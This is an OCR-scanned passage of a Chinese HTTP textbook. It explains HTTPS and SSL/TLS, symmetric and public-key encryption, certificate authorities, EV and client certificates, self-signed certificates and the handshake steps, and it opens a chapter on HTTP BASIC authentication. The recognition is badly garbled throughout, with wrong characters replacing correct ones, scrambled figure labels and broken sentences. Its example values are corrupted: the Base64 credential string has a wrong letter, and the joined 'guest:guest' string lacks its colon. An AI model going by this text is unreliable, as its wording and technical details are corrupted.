SSL (Secure Socket Layer) 和 TLS (Transport Layer Security) 协议 代 
蔡 而 已 。 


通常 ，HTTP 直接 和 TCP 通信 。 当 使 用 SSL 时 ， 则 演变 成 先 和 SSL 通 
信 ， 再 由 SSL 和 TCP 通信 了 。 简 言 之 ， 所 请 HTTPS， 其 实 束 是 丑 披 
SSL 协议 这 层 外 元 的 HITP。 





HTTR HTTRS 


在 采用 SSL 后 ，HTTP 就 拥有 了 HTTPS 的 加 密 、 证 书 和 完整 性 保护 
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SSL 是 独立 于 HTTP 的 协议 ， 所 以 不 光 是 HTTP 协议 ， 其 他 运行 在 应 
用 层 的 SMTP 和 Telnet 等 协议 均 可 配合 SSL 协议 使 用 。 可 以 说 SSL 是 
当今 世界 上 应 用 最 为 广泛 的 网 络 安全 技术 。 

7.2.3 ”相互 交换 密 钥 的 公开 密 钥 加 密 技 术 


在 对 SSL 进行 讲解 之 前 ， 我 们 先 来 了 解 一 下 加 密 方 法 。SSL 采 用 一 种 
叫做 公开 密 钥 加 密 (Public-key cryptography) 的 加 密 处 理 方式 。 


近代 的 加 密 方 法 中 加 密 算 法 是 公开 的 ， 而 密 钥 却 是 保密 的 。 通 过 这 种 
方式 得 以 保持 加 秘方 法 的 安全 性 。 
加 密 和 解密 都 会 用 到 密 钥 。 没 有 密 钥 惑 无 法 对 密码 解密 ， 反 过 来 说 ， 
任何 人 只 要 持 有 密 钥 就 能 解密 了 。 如 果 密 钥 被 攻击 者 获得 ， 那 加 密 也 
就 失去 了 意义 。 

。 共 至 密 钥 加 密 的 困境 


加 密 和 解密 同 用 一 个 密 钥 的 方式 称 为 共享 密 钥 加 密 (Common key 
crypto system) ， 也 被 叫做 对 称 密 钥 加 密 。 





加 密 解 密使 用 
相同 的 密 钥 





呵呵 呵 





, PR 
© 1 只 要 拿 到 密 钥 ，1 
5 “wh 任何 人 都 能 破解 ! 
万 1 密码 


攻击 者 ~-------- 
以 共享 密 钥 方 式 加 密 时 必须 将 密 钥 也 发 给 对 方 。 可 究竟 怎样 才能 
安全 地 转交 ? 在 互联 网 上 转发 密 钥 时 ， 如 果 通 信和 被 监听 那么 密 铀 
就 可 会 落 入 攻击 者 之 手 ， 同 时 也 就 失去 了 加 密 的 意义 。 另 外 还 得 
设法 安全 地 保管 接收 到 的 密 钥 。 
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发 送 密 钥 就 有 被 窃听 的 风险 , 但 不 发 送 , 对方 就 不 能 解密 。 再 说 ， 窗 
钥 若 能 够 安全 发 送 , 那 数据 也 应 该 能 安全 送 达 。 





图 : 密 钥 发 送 问 题 
。 使 用 两 把 密 钥 的 公开 和 密 钥 加 密 
公开 密 钥 加 密 方式 很 好 地 解决 了 共享 密 钥 加 密 的 困难 。 


公开 密 钥 加 密使 用 一 对 非 对 称 的 密 钥 。 一 把 叫做 私有 和 密 钥 
(private key) ， 男 一 把 叫做 公开 密 钥 (public key) 。 顾 名 思 
义 ， 私 有 密 钥 不 能 让 其 他 任何 人 知道 ， 而 公开 密 钥 则 可 以 随意 发 
布 ， 任 何人 都 可 以 获得 。 


使 用 公开 密 钥 加 密 方 式 ， 发 送 密 叉 的 一 方 使 用 对 方 的 公开 密 钥 进 
行 加 密 处 理 ， 对 方 收 到 被 加 密 的 信息 后 ， 再 使 用 目 己 的 私有 密 钼 
进行 解密 。 利 用 这 种 方式 ， 不 需要 发 送 用 来 解密 的 私有 密 钥 ， 也 
不 必 担 心 密 钥 被 攻击 者 锣 听 而 盗 走 。 


另外 ， 要 想 根据 密 文 和 公开 密 钥 ， 恢 复 到 信息 原文 是 异常 困难 
的 ， 因 为 解密 过 程 就 是 在 对 离散 对 数 进行 求 值 ， 这 并 非 轻 而 易 举 
就 能 办 到 。 退 一 步 讲 ， 如 果 能 对 一 个 非常 大 的 整数 做 到 快速 地 因 
式 分 解 ， 那 么 密码 破解 还 是 存在 希望 的 。 但 就 目前 的 技术 来 看 是 
不 太 现 实 的 。 
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ae 





公开 密 钥 可 
转交 给 任何 人 公开 密 钥 
私有 密 钥 
公开 密 钥 公开 密 钥 和 私有 密 钥 
是 配对 的 一 套 密 钥 





em 
Naf en A 
用 公开 gy i 
进行 加 密 


HTTPS 采用 混合 加 密 机 制 


HTTPS 采用 共享 密 钥 加 密 和 公开 密 钥 加 密 两 者 并 用 的 混合 加 密 
机 制 。 寿 密 钥 能 够 实现 安全 交换 ， 那 么 有 可 能 会 考虑 仪 使 用 公开 
密 钥 加 密 来 通信 。 但 是 公开 密 钥 加 密 与 共享 密 钥 加 密 相 比 ， 其 处 
理 速 度 要 慢 。 


所 以 应 充分 利用 两 者 各 目的 优势 ， 将 多 种 方法 组 合 起 来 用 于 通 
信 。 在 交换 密 钥 环节 使 用 公开 密 钥 加 密 方式 ， 之 后 的 建立 通信 交 
换 报 文 阶段 则 使 用 共 圣 密 钥 加 密 方式 。 











147 


公开 密 钥 加 密 处 理 起 来 比 共 享 密 钥 加 密 方式 更 为 复杂 ， 因 此 若 在 通 





信 时 使 用 公开 密 钥 加 密 方式 , 效率 就 很 低 





了 DD 使 用 公开 密 钥 加 密 方式 安全 地 交换 在 稍 后 的 共享 密 钥 加 密 中 要 使 用 的 密 钥 
好 






2) 确 保 交 换 的 密 铀 是 安全 的 前 提 下 ,使 用 共享 密 钥 加 密 方式 进行 通信 


共享 密 钥 加 密 





图 : 混合 加 密 机 制 
7.2.4 证 明 公 开 密 钥 正 确 性 的 证 书 


遗憾 的 是 ， 公 开 密 钥 加 密 方 式 还 是 存在 一 些 问题 的 。 那 就 是 无 法 证 明 
公开 密 钥 本 喘 就 是 货真价实 的 公开 密 钥 。 比 如 ， 正 准备 和 茶 台 服务 右 
建立 公开 密 钥 加 密 方 式 下 的 通信 时 ， 如 何 证 明 收 到 的 公开 密 钥 就 是 原 
本 预想 的 那 台 服 务 器 发 行 的 公开 密 钥 。 或 许 在 公开 密 钥 传输 途中 ， 真 
正 的 公开 密 钥 己 经 被 攻击 者 人 答 换 折 了。 


为 了 解雇 上 述 问 题 ， 可 以 使 用 由 数字 证 书 认 证 机 构 (CA，Certificate 
Authority) 和 其 相关 机 关 颁 发 的 公开 密 钥 证 书 。 


数字 证 书 认证 机 构 处 于 客 己 端 与 服务 器 双方 都 可 信赖 的 第 三 方 机 构 的 
立场 上 。 威 瑞 信 〈VeriSign) 就 是 其 中 一 家 非常 有 名 的 数字 证 书 认 证 
机 构 。 我 们 来 介绍 一 下 数字 证 书 认证 机 构 的 业务 流程 。 首 先 ， 服 务 器 
的 运营 人 员 同 数字 证 书 认证 机 构 提 出 公开 和 密 钥 的 申请 。 数 字 证 书 认证 
机 构 在 判明 提出 申请 者 的 号 份 之 后 ， 会 对 已 申请 的 公开 密 钥 做 数字 签 
名 ， 然 后 分 配 这 个 已 签名 的 公开 密 钥 ， 并 将 该 公开 密 钥 放 入 公 钥 证 书 
后 绑 定 在 一 起 。 


服务 器 会 将 这 份 由 数字 证 书 认 证 机 构 颁 发 的 公 钥 证 书 发 送 给 客户 端 ， 
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人 
为 证 书 。 


接 到 证 书 的 客户 问 可 使 用 数字 证 书 认 证 机 构 的 公开 密 铀 ， 对 那 张 证 书 
上 的 数字 签名 进行 验证 ， 一 旦 验证 通过 ， 客 户 端 便 可 明确 两 件 事 : 
一 ， 认 证 服务 需 的 公开 密 钥 的 是 真实 有 效 的 数字 证 书 认证 机 构 。 二 ， 
服务 占 的 公开 密 钥 是 值得 信赖 的 。 


此 处 认证 机 关 的 公开 密 钥 必须 安全 地 转交 给 客户 端 。 使 用 通信 方式 
时 ， 如 何 安 全 转交 是 一 件 很 困难 的 事 ， 因 此 ， 多 数 浏览 器 开发 商 发 布 
版 本 时 ， 会 事先 在 内 部 植 入 常用 认证 机 关 的 公开 密 钥 。 
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Bs 





(@) 数 字 证 书 认 证 机 构 用 自己 的 私有 密 钥 向 服务 
器 的 公开 密码 署 数字 签名 并 颁发 公 钥 证 书 





数字 证 书 认证 机 构 
的 公开 密 钥 已 事先 数字 证 书 认 证 机 构 
植 入 到 浏览 器 里 了 







中 服务 器 把 自己 的 公开 密 钥 
登录 至 数字 证 书 认证 机 构 






3 客户 滑 人 到 服务 如 的 公 
钥 证 书后 , 使 用 数字 证 
书 认 证 机 构 的 公开 密 ee 
钥 , 向 数字 证 书 认证 机 服务 器 的 
构 验 证 公 钥 证 书 上 的 数 久 ”公开 密 铀 
字 签 名 ,以 确认 服务 器 : 
的 公开 密 钥 的 真实 性 数字 证 书 认证 






发 鲜 机 构 的 数字 签名 





公 钥 证 书 
服务 器 的 
< 一 一 私有 密 钥 
一 一 -一 一 一 回 服务 器 用 私 
@@ 使 用 服务 器 的 公开 密 钥 对 报 有 密 钥 对 报 
文 加 密 后 发 送 服务 器 文 解密 








预期 目的 (N): |< 所 有 > 
[个人 [其他 人 中 级 证 书 颁发 机 构 | 受信 任 的 根 证 书 颁发 机 构 | 受信 任 的 发 布 者 | ‘> 
| 颁发 给 颁发 者 截止 日 期 友好 名 务 ^ | 
GslThawte Timestampin,,。 Thawte Timestampin,.。 星期 五 01-01 Thawte 1 
Gm ~ DATACorp SGC UTN ~ DATACorp SGC 星期 二 06-25 USERTrus 
GS]UTN-USERFirst-0bject UTN-USERFirst-~0bject 星期 三 07~10 < 无 > 
ESJUTN-USERFirst-0bject UTN-USERFirst-0bject 星期 三 07-10 USERTrus 

Ba VeriSign Class 3 P,..。 Verisign Class 3 P,,， 是 期 四 07~17 VeriSsig 


GjVeriSign Class 3 P..。 VeriSign Class 3 P..。 量 期 四 07-17 < 无 > 
GslveriSign Class 3 P... Veri5ign Class 3 P... 星期 四 I 07-17 VeriSigr ~ 














« 得 上 





[导入 (DD.…， | [导出 (E)..。 | | 删除 (R) [高 级 (A) | 


证 书 的 预期 目的 
代码 签名 ， 服 务 器 身份 验证 ， 客 户 端 身份 验证 ， 安 全 电子 部 件 





查看 (VY) 
| 关闭 (C) 
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可 证 明 组 织 真实 性 的 EV SSL 证书 


证 书 的 一 个 作用 是 用 来 证 明 作 为 通信 一 方 的 服务 器 是否 规 范 ， 男 
外 一 个 作用 是 可 确认 对 方 服 务 器 背后 运营 的 企业 是 否 真实 存在 。 
拥有 该 特性 的 证 书 就 是 EV SSL 证 书 (Extended Validation SSL 
Certificate ) 。 


EV SSL 证 书 是 基于 国际 标准 的 认证 指导 方针 颁发 的 证 书 。 其 严 
格 规定 了 对 运营 组 织 是 人 否 真实 的 确认 方针 ， 因 此 ， 通 过 认证 的 
Web 网 站 能 够 获得 更 高 的 认可 度 。 


持 有 EV SSL 证 书 的 Web 网 站 的 浏览 器 地 址 栏 处 的 背景 色 是 绿色 
的 ， 从 视觉 上 就 能 一 眼 辨 别 出 。 
证 书 中 记录 的 组 织 名 称 以 及 颁发 证 书 的 认证 机 构 的 名 称 




















上 述 机 制 的 原意 图 是 为 了 防止 用 户 被 钓鱼 攻击 〈Phishing) ， 但 
就 效果 上 来 讲 ， 还 得 打 一 个 问号 。 很 多 用 户 可 能 不 了 解 EV SSL 
证 书 相 关 的 知识 ， 因 此 也 不 太 会 留意 它 。 


用 以 确认 客户 端的 客户 端 证 书 

es 崩 证 书 。 以 客户 端 证 书 进 行 客户 端 认 
， 证 明 服务 器 正在 通信 的 对 方 始终 是 预料 之 内 的 客户 端 ， 其 作 

| 


0 0 











想 获 取证 书 时 ， 用 户 得 自行 安装 客户 问 证 书 。 但 由 于 客户 端 证 书 

征 要 付费 购买 的 ， 且 每 张 证 书 对 应 到 每 位 用 户 也 惑 意 味 独 需 文 付 
和 用 户 数 对 等 的 颖 用。 男 外 ， 要 让 知识 层次 不 同 的 用 户 们 自行 安 
装 证 书 ， 这 件 事 本 里 也 充满 了 各 种 挑战 。 


现状 是， 安全 性 极品 的 认证 机 构 可 颁 友 客户 端 证 书 但 仪 用 于 特殊 
用 途 的 业务 。 比 如 那些 可 支撑 客户 并 证 书 支 出 费用 的 业务 。 


例如 ， 银 行 的 网 上 银行 就 采用 了 客户 端 证 书 。 ， 
要 求 用 户 确 认输 入 ID 和 密码 ， 还 会 要 求 用 户 的 客户 端 证 书 ， 
确认 用 户 是 否 从 特定 的 终端 访问 网 银 ， 














1S1 





客户 端 证 书 存在 的 另 一 个 问题 点 是 ， 客 户 端 证 书 毕 葛 只 能 用 来 证 
明 客 户 端 实际 存在 ， 而 不 能 用 来 证 明 用 户 本 人 的 真实 有 效 性 。 也 
就 是 说 ， 只 要 获得 了 安 浪 有 客户 端 证 书 的 计算 机 的 使 用 权限 ， 也 
就 意味 着 同时 拥有 了 客户 端 证 书 的 使 用 权限 。 


认证 机 构 信誉 第 一 


SSL 机 制 中 介入 认证 机 构 之 所 以 可 行 ， 是 因为 建立 在 其 信用 绝对 
可 靠 这 一 大 前 提 下 的 。 然 而 ，2011 年 7 月 ， 和 荷兰 的 一 家 名 叫 
DigiNotar 的 认证 机 构 曾 遭 黑客 不 法 入 侵 ， 颁 布 了 google.com 和 
twitter.com 等 网 站 的 伪造 证 书 事 件 。 这 一 事件 从 根本 上 撼动 了 
SSL 的 可 信 度 。 


因为 伪造 证 书 上 有 正规 认证 机 构 的 数字 签名 ， 所 以 浏览 器 会 判定 
该 证 书 是 正当 的 。 当 伪造 的 证 书 被 用 做 服务 器 伪装 之 时 ， 用 户 根 
本 无 法 察觉 到 。 


虽然 存在 可 将 证 书 无 效 化 的 证 书 吊销 列表 〈Certificate Revocation 
List，CRL) 机 制 ， 以 及 从 客户 端 删 除根 证 书 颁发 机 构 (Root 
Certificate Authority，RCA) 的 对 策 ， 但 是 距离 生效 还 需要 一 段 
J W020 到 底 会 有 多 少 用 户 的 利益 蒙受 损失 就 不 
得 而 和 


由 自 认 证 机 构 颁 发 的 证 书 称 为 自 签名 证 书 

如 果 使 用 OpenSSL 这 套 开 源 程序 ， 每 个 人 都 可 以 构建 一 套 属 于 
自己 的 认证 机 构 ， 从 而 自己 给 自己 颁发 服务 器 证 书 。 但 该 服务 器 
证 书 在 互联 网 上 不 可 作为 证 书 使 用 ， 似 乎 没什么 帮助 。 


独立 构建 的 认证 机 构 叫 做 自 认 证 机 构 ， 由 自 认 证 机 构 颁 发 的 “无 
用 ?证书 也 被 戏称 为 目 签 名 证 书 。 

浏览 需 访 问 该 服务 器 时 ， 会 显示 “无 法 确认 连接 安全 性 ”或 “该 网 
站 的 安全 证 书 存 在 问题 ”等 警告 消息 。 
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安全 警报 “| 
六 无 法 验证 此 网 站 的 标识 或 此 连接 的 完整 性 . 

访 挛 全 证 书 由 你 没有 寺 定 信任 的 公司 颁发 。 可 以 查看 证 书 

以 便 确 定 你 是 否 信 寿 该 验证 机 构 . 

该 安全 证 书 的 日 期 有 效 . 


@ 人 


是 否 继续 ? 





| “是 MM || 和 NM ”|| 查看 证 书 M | 





由 目 认 证 机 构 颁 发 的 服务 器 证 书 之 所 以 不 起 作用 ， 是 因为 它 无 法 
消除 伪装 的 可 能 性 。 目 认证 机 构 能 够 产生 的 作用 顶 多 也 惑 是 目 己 
对 外 宣称 "我 是 oo” 的 这 种 程度 。 即 使 采用 目 签 名 证 书 ， 通 过 SSL 
加 密 之 后 ， 可 能 偶尔 还 会 看 见 通 信 处 在 安全 状态 的 提示 ， 可 那 也 
是 有 问题 的 。 因 为 就 算 加 密 通 信 ， 也 不 能 排除 正在 和 已 经 过 伪 
装 的 假 服 务 器 保持 通信 。 


值得 信赖 的 第 三 方 机 构 介 入 认证 ， 才 能 让 已 植 入 在 浏览 右 内 的 认 
证 机 构 外 布 的 公开 密 钠 发挥 作用 并 借 此 证 明 服 务 器 的 真实 性 。 


中 级 认证 机 构 的 证 书 可 能 会 变 成 目 认 证 证 书 


多 数 浏览 器 内 预先 已 植 入 备 受 信赖 的 认证 机 构 的 证 书 ， 但 也 有 一 
小 部 分 浏览 右 会 植 入 中 级 认证 机 构 的 证 书 。 


对 于 中 级 认证 机 构 颁 发 的 服务 器 证 书 ， 东 些 浏览 器 会 以 正规 的 证 
书 来 对 待 ， 可 有 的 浏览 器 会 当 作 目 签 名 证 书 。 


7.2.5 ”HTTPS 的 安全 通信 机 制 
为 了 更 好 地 理解 HTTPS， 我 们 来 观察 一 下 HTTPS 的 通信 步骤 。 
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人 


Hand 
shake: ClientHello 


Handshake. ServerHello | 
Handshake- Certificate CD 
Handshake. ServerHelloDone 动 
Hand 
@ Shake: Clientk 
ChangeCi 二 
Handsh 
ake: Finished 
ChangeCipherSpec 侣 
Handshake: Finished 9 


Application Datal HTT 
P ) 


ep 
@ A 
lert: i 
图 : HTTPS 通信 
步骤 1: 客户 端 i 
” de ) 甬 过 发 送 
2 at Client Hello 报 》 
支持 的 SSL 的 指 内 o 报 文 开始 SSL 通信 。 报 3 
使 用 es 加 密 组 件 0 
步骤 2: 服务 器 可 进行 
器 可 进行 SSL 通信 时 ， 会 以 Server Hello 报 
ello 报 文 作为 应 
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答 。 和 客户 端 一 样 ， 在 报 文 中 包含 SSL 版 本 以 及 加 密 组 件 。 服 务 器 的 
加 密 组 件 内 容 是 从 接收 到 的 客户 问 加 密 组 件 内 筛选 出 来 的 。 


步骤 3: 之 后 服务 器 发 送 Certificate 报 文 。 报 文中 包含 公开 密 钥 证 


SN 


步骤 4: 最 后 服务 器 发 送 Server Hello Done 报 文通 知客 户 端 ， 最 初 阶 
段 的 SSL 握手 协商 部 分 结束 。 


步骤 $: SSL 第 一 次 握手 结束 之 后 ， 客 户 端 以 Client Key Exchange 报 
文 作为 回应 。 报 文中 包含 通信 加 密 中 使 用 的 一 种 被 称 为 Pre-master 
secret 的 随机 密码 串 。 该 报 文 已 用 步骤 3 中 的 公开 密 钥 进行 加 密 。 


步 又 6: 接着 客户 端 继续 发 送 Change Cipher Spec 报 文 。 该 报 文 会 提 
示 服 务 器 ， 在 此 报 文 之 后 的 通信 会 采用 Pre-master secret 密 钥 加 密 。 


步骤 7: 客户 端 发 送 Finished 报 文 。 该 报 文 包含 连接 至 今 全 部 报 文 的 
整体 校 验 值 。 这 次 握手 协商 是 否 能 够 成 功 ， 要 以 服务 嚣 是否 能 够 正确 
解密 该 报 文 作为 判定 标准 。 

步骤 8: 服务 器 同样 发 送 Change Cipher Spec 报 文 。 

步骤 9: 服务 器 同样 发 送 Finished 报 文 。 


步骤 10: 服务 器 和 客户 端的 Finished 报 文 交换 完毕 之 后 ，SSL 连接 
就 算 建 立 完 成 。 当 然 ， 通 信 会 受到 SSL 的 保护 。 从 此 处 开始 进行 应 用 
层 协 议 的 通信 ， 即 发 送 HTTP 请 求 。 


步骤 11: 应 用 层 协议 通信 ， 即 发 送 HTTP 啊 应 。 


步骤 12: 最 后 由 客户 端 断 开 连接 。 上 断 开 连接 时 ， 发 送 close_notify 报 
人 
J 通信 。 


在 以 上 流程 中 ， 应 用 层 发 送 数据 时 会 附加 一 种 叫做 MAC (Message 
Authentication Code) 的 报 文摘 要 。MAC 能 够 查 知 报 文 是 否 遭 到 算 
改 ， 从 而 保护 报 文 的 完整 性 。 


下 面 是 对 整个 流程 的 图 解 。 图 中 说 明了 从 仅 使 用 服务 器 端的 公开 密 钥 
证 书 ( 服 务 器 证 书 ) 建立 HTTPS 通信 的 整个 过 程 。 
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用 私 用 密 钥 解密 立 rp 
私有 密 铀 pre-rmraester secret 投机 的 是 
配对 密 钥 生成 rmaster secret 生成 CBC 模 式 - 的 初始 向 量 


公开 密 钥 证 书 
( 服务 器 证 书 ) 


。 共享 密 钥 加 密 的 密 钥 

。 报 文 校 验 码 的 密 钥 

。 生成 CBC 的 初始 向 量 ， 
服务 器 一 用 于 客户 站 ， 
以 及 客户 端 一 用 于 服务 


pre-master secret 器 的 6 份 信息 


使 用 服务 器 上 的 公开 
密 钥 对 pre-rmaster 共享 密 钥 加 密 的 密 钥 


报 文 校 验 码 的 密 钥 
secret 加 密 处 理 生成 CBC 模 式 的 初始 向 量 


i Ooi 0 Le SOCIe ES 
secret 


a 公开 多 钥 {随机 数 ) 





1 CBC 模式 (Cipher Block Chaining) 又 名 密码 分 组 链接 模式 。 在 此 模式 下 ， 将 前 
ee 处 理 后 和 下 一 个 明文 块 做 XOR 运算 ， 使 之 重 辣 ， 然 后 再 对 运算 

结果 做 加 密 处 理 。 对 第 一 个 明文 块 做 加 密 时 ， 要 么 使 用 前 一 段 密 文 的 最 后 一 块 ， 

要 么 利用 外 部 生成 的 初始 向 量 (initial vector，IV) 。 一 一 译 者 注 


。SSL 和 TLS 


HTTPS 使 用 SSL (Secure Socket Layer) 和 TLS (Transport Layer 
Security) 这 两 个 协议 。 


SSL 技术 最 初 是 由 浏览 器 开发 商 网 景 通信 公司 率先 倡导 的 ， 开 发 
过 SSL3.0 之 前 的 版 本 。 目 前 主导 权 已 转移 到 IETF (Internet 
Engineering Task Force， Internet 工程 任务 组 ) 的 手中 。 


IETF 以 SSL3.0 为 基准 ， 后 又 制定 了 TLS1.0、TLS1.1 和 
TLS1.2。TSL 是 以 SSL 为 原型 开发 的 协议 ， 有 时 会 统一 称 该 协议 
为 SSL。 当 前 主流 的 版 本 是 SSL3.0 和 TLS1.0。 

由 于 SSL1.0 协议 在 设计 之 初 被 发 现 出 了 问题 ， 就 没有 实际 投入 
使 用 。SSL2.0 也 被 发 现存 在 问题 ， 所 以 很 多 浏览 器 直接 废除 了 
该 协议 版 本 。 
。SSL 速度 慢 吗 


156 


HTTPS 也 存在 一 些 问 题 ， 那 就 是 当 使 用 SSL 时 ， 它 的 处 理 速度 


会 变 慢 。 


解密 处 理 ， 因 此 会 消耗 CPU 和 内 存 等 硬件 资源 】 上 


SSL 
人 


HTTP 请求 


站 由 于 HTTPS 还 需要 做 服务 器 、 客 户 端 双 方 加 密 及 | ， 





HTTP 响应 





~ ”| 和 HTTP 通 信 相 比 , SSL 通 信 部 分 消耗 网 络 资源 。 
客户 端 而 SSL 通 信 部 分 , 又 因为 要 对 通信 进行 处 理 , 所 服务 器 
\ 以 时 间 上 又 延长 了 


图 :HTTPS 比 HTTP 要 慢 2 到 100 倍 


SSL 的 慢 分 两 种 。 一 种 是 指 通 信 慢 。 男 一 种 是 指 由 于 大 量 消耗 
CPU 及 内 存 等 资源 ， 导 致 处 理 速度 变 慢 。 


和 使 用 HTTP 相 比 ， 网 络 负载 可 能 会 变 慢 2 到 100 倍 。 除 去 和 
TCP 连接 、 发 送 HTTP 请 求 。 啊 应 以 外 ， 还 必须 进行 SSL 通信 ， 
因此 整体 上 处 理 通 信 量 不 可 避免 会 增加 。 


另 一 点 是 SSL 必须 进行 加 密 处 理 。 在 服务 器 和 客户 端 都 需要 进行 
加 密 和 人 解密 的 运算 处 理 。 因 此 从 结果 上 讲 ， 比 起 HITP 会 更 多 地 
消耗 服务 器 和 客户 端的 硬件 资源 ， 导 致 负载 增强 。 

针对 速度 变 慢 这 一 问题 ， 并 没有 根本 性 的 解决 方案 ， 我 们 会 使 用 
SSL 加速 器 这 种 〈 专 用 服务 器 ) 硬件 来 改善 该 问题 。 该 硬件 为 
SSL 通信 专用 硬件 ， 相 对 软件 来 讲 ， 能 够 提高 数 倍 SSL 的 计算 速 
度 。 仅 在 SSL 处 理 时 发 挥 SSL 加 速 器 的 功效 ， 以 分 担负 载 。 

为 什么 不 一 直 使 用 HTTPS 


既然 HTTPS 那么 安全 可 靠 ， 那 为 何 所 有 的 Web 网 站 不 一 直 使 用 











HTITPS ? 


其 中 一 个 原因 是 ， 因 为 与 纯 文本 通信 相 比 ， 加 密 通信 会 消耗 更 多 的 
CPU 及 内 存 资源 。 如 果 每 次 通信 都 加 密 ， 会 消耗 相当 多 的 资源 ， 平 
挫 到 一 台 计 算 机 上 时 ， 能 够 处 理 的 请 求 数量 必定 也 会 随 之 减少 。 
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因此 ， 如 果 是 非 敏感 信息 则 使 用 HTTP 通信 ， 只 有 在 包含 个 人 信息 
等 敏感 数据 时 ， 才 利用 HTTPS 加 密 通 信 。 


特别 是 每 当 那 些 访 问 量 较 多 的 Web 网 站 在 进行 加 密 处 理 时 ， 它 们 
所 承担 着 的 负载 不 容 小 舰 。 在 进行 加 密 处 理 时 ， 并 非 对 所 有 内 容 都 
进行 加 密 处 理 ， 而 是 仅 在 那些 需要 信息 隐藏 时 才 会 加 密 ， 以 节约 资 
源 。 









1f797cO04ed91297d9dd 
9d71b09b66alf... 






加 窗 和 般 字 的 运算 


太 累 人 3 ~ 






服务 器 
除 此 之 外 ， 想 要 节约 购买 证 书 的 开销 也 是 原因 之 一 。 


要 进行 HTTPS 通信 ， 证 书 是 必 不 可 少 的 。 而 使 用 的 证 书 必 须 问 认 

证 机 构 〈CA) 购买 。 证 书 价格 可 能 会 根据 不 同 的 认证 机 构 略 有 不 

Ag 
民 币 ) 。 


那些 购买 证 书 并 不 合算 的 服务 以 及 一 些 个 人 网 站 ， 可 能 只 会 选择 采 
用 HTTP 的 通信 方式 。 
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第 8 和 章 确认 访问 用 户 身 份 的 认 
证 


茶 些 Web 页 面 只 想 让 特定 的 人 浏览 ， 或 者 干脆 仅 本 人 可 见 。 为 达到 





ee 
儿 制 | 。 





8.1 何 为 认证 


计算 机 本 刁 无 法 判断 坐 在 显示 器 前 的 使 用 者 的 身份 。 进 一 步 说 ， 也 无 
法 确认 网 络 的 那 头 究竟 有 谁 。 可 见 ， 为 了 弄 清 完 竟 是 谁 在 访问 服务 
器 ， 就 得 让 对 方 的 客户 问 目 报 家 门 。 

可 古 ， 惑 算 正 在 访问 服务 器 的 对 方 声称 自己 是 ueno， 喘 份 是 否 属实 这 
扩 却 也 无 从 谈 起 。 为 确认 ueno 本 人 是 否 真 的 具有 访问 系统 的 权限 ， 
就 需要 核对 “登录 者 本 作 才 知道 的 信息 ”“ 登 录 者 本 人 才 会 有 的 信 

















核对 的 信息 通常 是 指 以 下 这 些 。 
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E23 
Es 


码 : 只 有 本 人 才 会 知道 的 字符 串 信息 。 

态 令 牌 : 仅 限 本 人 持 有 的 设备 内 显示 的 一 次 性 密码 。 
数字 证 书 : 仅 限 本 人 “终端 ) 持 有 的 信息 。 

生物 认证 : 指纹 和 虹膜 等 本 人 的 生理 信息 。 

IC 卡 等 : 仅 限 本 人 持 有 的 信息 。 





© @ @ 
| 
过 










我 是 上 上野。 我 的 穹 码 是 
XXXXXxx。 你 瞧 ， 我 和 
道 窗 码 ， 可 以 确认 我 是 
本 大. 3 吧 ? 





但 是 ， 即 便 对 方 是 假冒 的 用 户 ， 只 要 能 通过 用 户 验 证 ， 那 么 计算 机 就 
会 默认 是 出 自 本 人 的 行为 。 因 此 ， 掌 控 机 密 信 息 的 密码 绝 不 能 让 他 人 
得 到 ， 更 不 能 轻易 地 就 被 破解 出 来 。 
HTTP 使 用 的 认证 方式 
HTTP/1.1 使 用 的 认证 方式 如 下 所 示 。 

。BASIC 认证 (基本 认证 ) 

。DIGEST 认证 (摘要 认证 ) 

。SSL 客户 端 认证 

。FormBase 认证 (基于 表单 认证 ) 
此 外 ， 还 有 Windows 统一 认证 (Keberos 认证 、NTLM 认证 ) ， 但 本 
书 不 作 讲 解 。 


8.2 ”BASIC 认证 
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BASIC 认证 (基本 认证 ) 是 从 HITP/1.0 就 定义 的 认证 方式 。 即 便 是 
现在 仍 有 一 部 分 的 网 站 会 使 用 这 种 认证 方式 。 是 Web 服务 器 与 通信 
客户 端 之 间 进 行 的 认证 方式 。 
BASIC 认证 的 认证 步 又 





{®) GET /private/ HTTP/1.1 
日 Host: hackrJp 
客户 端 oe oe we 
人 返回 状态 码 401 以 告知 客户 端 需要 进行 认证 
HTTP/1,1 401 Authorization Required 
Date: Mon, 19 Sep 2011 08:38:32 GMT ey 
Server Apache/2.2.3 (Unix} 服务 器 





WWW-Authenticate; Basic realm="Input Your ID and Password.” 
2 用 户 ID 和 密码 以 Base64- 方 式 编码 后 发 送 
-(®) guest:guest 一 Base64 一 Z3VIc3Q6Z3VIc3Q= 
同 GET /private/ HTTP/1.1 


Host: hackr.jp 
Authorization: Basic Z3VIc3Q6Z3VIc3Q= 


3) 认 证 成 功 者 返回 状态 码 200, 若 认 证 失败 则 返回 状态 码 401 








HTTP/1.1 200 OK 
Date: Mon, 19 Sep 2011 08:38:35 GMT 
Server: Apache/2.2.3 {Unix) 








图 : BASIC 认证 概要 


步骤 1: 当 请 求 的 资源 需要 BASIC 认证 时 ， 服 务 器 会 随 状 态 码 401 

Authorization Required， 返 回 带 WWW-Authenticate 首部 字段 的 啊 应 。 

该 字段 内 包含 认证 的 方式 (BASIC) 及 Request-URI 安全 域 字符 串 
(realm) 。 


步骤 2: 接收 到 状态 码 401 的 客户 端 为 了 通过 BASIC 认证 ， 需 要 将 
用 户 ID 及 密码 发 送 给 服务 器 。 发 送 的 字符 串 内 容 是 由 用 户 ID 和 密码 
构成 ， 两 者 中 间 以 冒号 〈:) 连接 后 ， 再 经 过 Base64 编码 处 理 。 


假设 用 户 ID 为 guest， 密 码 是 guest， 连 接 起 来 就 会 形成 guestguest 这 
样 的 字符 串 。 然 后 经 过 Base64 编码 ， 最 后 的 结果 即 是 
Z3Vlc3Q6Z3Vlc3Q=。 把 这 串 字 符 串 写 入 首部 字段 Authorization 后 ， 


当 用 户 代理 为 浏览 器 时 ， 用 户 仅 需 输入 用 户 ID 和 密码 即 可 ， 之 后 ， 
浏览 器 会 自动 完成 到 Base64 编码 的 转换 工作 。 
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请 输入 用 户 名 和 密码 X 


ED http://hackrjp 请 求 用 户 各 和 密码 。 
用 户 名 : || 
密码 : 


确定 取消 











步骤 3: 接收 到 包含 首部 字段 Authorization 请 求 的 服务 器 ， 会 对 认证 
信息 的 正确 性 进行 验证 。 如 验证 通过 ， 则 返回 一 条 包含 Request-URI 
资源 的 啊 应 。 


BASIC 认证 虽然 采用 Base64 编码 方式 ， 但 这 不 是 加 蜜 处理。 不 需要 
